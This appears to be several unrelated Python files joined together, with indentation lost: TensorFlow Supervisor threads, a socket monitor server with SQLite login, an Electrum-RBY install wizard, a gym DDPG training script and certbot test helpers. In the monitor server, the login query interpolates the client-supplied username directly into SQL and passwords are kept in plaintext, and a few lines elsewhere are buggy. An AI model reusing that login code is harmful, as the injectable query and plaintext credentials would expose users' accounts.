self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess, step_counter=None):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
step_counter: A `Tensor` holding the step counter. By defaults, it uses
sv.global_step.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
step_counter = sv.global_step if step_counter is None else step_counter
self._step_counter = step_counter
self._summary_tag = "%s/sec" % self._step_counter.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._step_counter)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._step_counter)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
if elapsed_time > 0.:
steps_per_sec = added_steps / elapsed_time
else:
steps_per_sec = float("inf")
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
logging.info("Saving checkpoint to path %s", self._sv.save_path)
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
Monitor_server.py | import sys
import socket
import sqlite3
import select
import sys
import threading
import thread
from threading import Thread, Lock
from multiprocessing.pool import ThreadPool
import json
number_of_masters = 2
masters = dict()
clients = dict()
threshold = {'Master1':'No','Master2':'No'}
i = 0
receivestatus_port = 10008
def thresholdListen():
'''listen for threshold from the masters and update threshold dictionary.this will be used will redirecting requests to master.'''
print 'Threshold daemon running'
portNumber = 10007
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
host = socket.gethostname()
sock.bind((host, portNumber))
while True:
request, addr = sock.recvfrom(1024)
master,val = request.split(" ")
threshold[master]= val
def informslaves(data):
req = {"request":"New","data":data}
with open("config/slave.txt",'r') as fin:
for line in fin:
host,port = line.strip().split("=")[1].split(",")[0].split(":")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(json.dumps(data), (host,int(port)))
sock.close()
def receiveStatus():
'''get the status for processed request from master and send it back to client'''
global masters
print 'Listening for status on port ' + str(receivestatus_port)
portNumber = receivestatus_port
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
host = socket.gethostname()
sock.bind((host, portNumber))
while True:
status, addr = sock.recvfrom(1024)
returnobj=json.loads(status)
if returnobj['result'] == "shutdown":
masters = {k:v for k,v in masters.items if v.split(":")[0] != addr[0]}
elif returnobj['result'] == "New":
data = "Master{}={}:{}".format(len(masters)+1,addr[0],returnobj['port'])
with open("config/masters.txt",'a') as myfile:
myfile.write("{}\n".format(data))
with open("config/slave.txt",'r') as fin:
slaves = ""
for line in fin:
slaves = slaves + line
sock.sendto(slaves,(addr[0],int(returnobj['port'])))
informslaves(data)
masters["Master{}".format(len(masters)+1)] = "{}:{}".format(addr[0],returnobj['port'])
else:
clients[returnobj['userid']].send(str(returnobj['result']))
class Server:
''' Accept requests from clients and redirect them to masters in round robin pattern'''
def __init__(self):
self.host = ''
self.port = 13464
self.backlog = 5
self.size = 1024
self.server = None
self.pool = ThreadPool(10)
with open("config/masters.txt") as myfile:
for line in myfile:
name, endpoint = line.partition("=")[::2]
masters[name] = endpoint
#name = "Master1"
#endpoint = "localhost:10003"
def open_socket(self):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.host,self.port))
self.server.listen(5)
def run(self):
self.open_socket()
input = [self.server,]
running = 1
#start a daemon thread to listen threshold
thread = Thread(target = thresholdListen, args = ())
thread.start()
#start a thread to listen results of req from masters
resultThread = Thread(target = receiveStatus, args = ())
resultThread.start()
while running:
inputready,outputready,exceptready = select.select(input,[],[])
for s in inputready:
if s == self.server:
client,address = self.server.accept()
#Assign one thread to handle each client.
self.pool.apply_async(run, args=(client,address))
else:
junk = sys.stdin.readline()
running = 0
self.server.close()
def getMaster():
'''This method will return the next master to which the request should be redirected.'''
global i
i=((i)%(number_of_masters))+1
while True:
if threshold['Master'+str(i)] == 'Yes':
i=((i)%(number_of_masters))+1
else:
break
return 'Master'+str(i)
def run(client,address):
'''This method will be run in seperate thread to process client requests.'''
size = 1024
running = 1
attempts = 0
flag = 0
while running:
while(attempts < 3 and flag == 0):
attempts = attempts + 1
data = json.loads(client.recv(size))
if data:
clients[data['username']]=client
conn_2 = sqlite3.connect('authentication_info.db')
c_2 = conn_2.cursor()
password = ""
for row in c_2.execute("SELECT password from user_info where username = '%s'" % data['username']):
password = row
conn_2.close()
if not password:
client.send('Login failed')
elif data['password'] != password[0]:
client.send('Login failed')
else:
print 'Login Successful\n'
client.send('Thank you for connecting')
flag = 1
break
request_key_value_pair = json.loads(client.recv(size))
if (request_key_value_pair['request']=="Logout"):
print "closing connection"
client.close()
running = 0
flag = 0
print 'Request is ' + str(request_key_value_pair)
master_node = getMaster()
print master_node+'is serving the request'
host,port = masters[master_node].partition(":")[::2]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print host,port
sock.sendto(json.dumps(request_key_value_pair), (host,int(port)))
sock.close()
#client.send("successfully received input data and request")
if __name__ == "__main__":
conn = sqlite3.connect('authentication_info.db')
c = conn.cursor()
#c.execute('''DROP TABLE user_info''')
c.execute("CREATE TABLE user_info (username text, password text)")
c.execute("INSERT INTO user_info values('shashank','goud')")
c.execute("INSERT INTO user_info values('ankit','bhandari')")
c.execute("INSERT INTO user_info values('kaustubh','sant')")
c.execute("INSERT INTO user_info values('nikhil','chintapallee')")
conn.commit()
conn.close()
s = Server()
s.run()
|
installwizard.py |
import sys
import os
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
import electrum_rby as electrum
from electrum_rby import Wallet, WalletStorage
from electrum_rby.util import UserCancelled, InvalidPassword
from electrum_rby.base_wizard import BaseWizard
from electrum_rby.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Rubycoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-RBY - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-rby.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-RBY wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
gym_reach7dof_train_1b.py | #### Training agent in Pusher7Dof gym env using a single real-world env
## 1a,1b : Trying threading for running rendering in parallel while taking actions
## Wrtitten by : leopauly | cnlp@leeds.ac.uk
## Courtesy for DDPG implementation : Steven Spielberg Pon Kumar (github.com/stevenpjg)
####
##Imports
import gym
from gym.spaces import Box, Discrete
import numpy as np
import cv2
from ddpg import DDPG
from ou_noise import OUNoise
import matplotlib.pyplot as plt
import scipy.misc as misc
## Imports for DNN
import os
from threading import Thread, Lock
import sys
from six.moves import xrange # pylint: disable=redefined-builtin
import PIL.Image as Image
import random
import numpy as np
import cv2
import time
import math
import matplotlib.pyplot as plt
import tensorflow as tf
from keras import backend as K
## Custom scripts
import lscript as lsp
import modelling as md
## Defining env
env = gym.make('Pusher7DOF-v1')
env.reset()
assert isinstance(env.observation_space, Box), "observation space must be continuous"
assert isinstance(env.action_space, Box), "action space must be continuous"
## Defining vars for reinfrocement learning algo
num_episodes=1000
num_rollouts=200
steps=num_rollouts
is_batch_norm = False #batch normalization switch
xrange=range
start_training=64
## vars for feature extraction
height=112
width=112
channel=3
crop_size=112
cluster_length=16
nb_classes=2
feature_size=4608 #8192 #16384 #487
saved_path='/home/ironman/trained_activity_nets/'
batch_size=32
demo_folder='./Demo_reach_1/'
## Defining placeholders in tf for images and targets
x_image = tf.placeholder(tf.float32, [None, 16,height,width,channel],name='x')
y_true = tf.placeholder(tf.float32, [None, nb_classes],name='y_true')
y_true_cls = tf.placeholder(tf.int64, [None],name='y_true_cls')
model_keras = md.C3D_ucf101_training_model_tf(summary=True)
out=model_keras(x_image)
y_pred = tf.nn.softmax(out)
y_pred_cls = tf.argmax(out, dimension=1)
correct_prediction = tf.equal(y_pred_cls, y_true_cls)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Loading netwrok framework finished..!!',flush=True)
def get_compress_frames_data(filename, num_frames_per_clip=cluster_length):
ret_arr = []
for parent, dirnames, filenames in os.walk(filename):
filenames = sorted(filenames)
jump=math.floor((len(filenames)/num_frames_per_clip))
loop=0
for i in range(0,len(filenames),jump):
if (loop>15):
break
if (filenames[i].endswith('.png')):
image_name = str(filename) + '/' + str(filenames[i])
img = Image.open(image_name)
img_data = np.array(img)
ret_arr.append(img_data)
loop=loop+1
ret_arr=np.array(ret_arr)
#ret_arr=ret_arr/255
return ret_arr
## Start the session with logging placement.
init_op = tf.global_variables_initializer()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False))
sess.run(init_op)
## Restore model weights from previously saved model
saver = tf.train.import_meta_graph(os.path.join(saved_path,'activity_model.ckpt-104.meta'))
saver.restore(sess, os.path.join(saved_path,'activity_model.ckpt-104'))
print("Model restored from file: %s" % saved_path,flush=True)
def demo_feature_extractor(demo_vid_path):
demo_vid_array=get_compress_frames_data(demo_vid_path)
return feature_extractor(demo_vid_array)
## For extracting activity features
def feature_extractor(vid_np):
#print('shape of video for feature extraction:',vid_np.shape)
vid_=vid_np.reshape(-1,cluster_length,height,width,channel)
#print(tf.contrib.graph_editor.get_tensors(tf.get_default_graph()))
#print(tf.get_default_graph().as_graph_def())
f_v = sess.graph.get_tensor_by_name('flatten_1/Reshape:0')
f_v_val=np.array(sess.run([f_v], feed_dict={'conv1_input:0':vid_,x_image:vid_,K.learning_phase(): 0 }))
#print('extracted video features shape:',f_v_val.shape)
features=np.reshape(f_v_val,(-1))
#print('features_shape',features.shape)
return features
def distance(f_demo,f_robo):
#print('shape f_demo',f_demo.shape,'shape f_demo',f_robo.shape)
return np.linalg.norm(f_demo-f_robo)
def s2l():
#Randomly initialize critic,actor,target critic, target actor network and replay buffer
num_states = feature_size #num_states = env.observation_space.shape[0]
num_actions = env.action_space.shape[0]
print ("Number of States:", num_states)
print ("Number of Actions:", num_actions)
agent = DDPG(env, is_batch_norm,num_states,num_actions)
exploration_noise = OUNoise(env.action_space.shape[0])
counter=0
reward_per_episode = 0
total_reward=0
print ("Number of Steps per episode:", steps)
reward_st = np.array([0]) #saving reward
demo_features=demo_feature_extractor(demo_folder)
for episode in range(num_episodes):
print ("==== Starting episode no:",episode,"====","\n")
env.reset() # Reset env in the begining of each episode
env.render()
obs_vid=[]
for i in range(16):
obs_img=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs_img,[112,112,3])
obs_vid.append(obs_new)
obs_vid=np.array(obs_vid)
observation =feature_extractor(obs_vid)
reward_per_episode = 0
for t in range(steps):
x = observation
action = agent.evaluate_actor(np.reshape(x,[1,num_states]))
noise = exploration_noise.noise()
action = action[0] + noise #Select action according to current policy and exploration noise
print ("Action at step", t ," :",action,"\n")
child_thread = Thread(target=child_function)
child_thread.start()
with io_lock:
_,_,done,info=env.step(action)
env.render()
print("Parent process continuing.")
vid_robo_=[]
for i in range(16):
obs=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs,[112,112,3])
vid_robo_.append(obs_new)
vid_robo=np.array(vid_robo_)
robo_features=feature_extractor(vid_robo)
observation=robo_features
reward=-(distance(demo_features,robo_features))
print('reward: ',reward)
#add s_t,s_t+1,action,reward to experience memory
agent.add_experience(x,observation,action,reward,done)
#train critic and actor network
if counter > start_training:
agent.train()
reward_per_episode+=reward
counter+=1
#check if episode ends:
if (done or (t == steps-1)):
print ('EPISODE: ',i,' Steps: ',t,' Total Reward: ',reward_per_episode)
print ("Printing reward to file")
exploration_noise.reset() #reinitializing random noise for action exploration
reward_st = np.append(reward_st,reward_per_episode)
np.savetxt('episode_reward.txt',reward_st, newline="\n")
print ('\n\n')
break
total_reward+=reward_per_episode
print ("Average reward per episode {}".format(total_reward / episodes))
def child_function():
i = 1000*20394
print("Child starts recording. Did stuff: " + str(i))
return
io_lock = Lock()
s2l()
|
util.py | """Test utilities."""
import logging
from multiprocessing import Event
from multiprocessing import Process
import shutil
import sys
import tempfile
import unittest
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import josepy as jose
import mock
import OpenSSL
import pkg_resources
import six
from six.moves import reload_module
from certbot import interfaces
from certbot import util
from certbot._internal import configuration
from certbot._internal import constants
from certbot._internal import lock
from certbot._internal import storage
from certbot.compat import filesystem
from certbot.compat import os
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
raise ValueError("Loader could not be recognized based on extension") # pragma: no cover
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
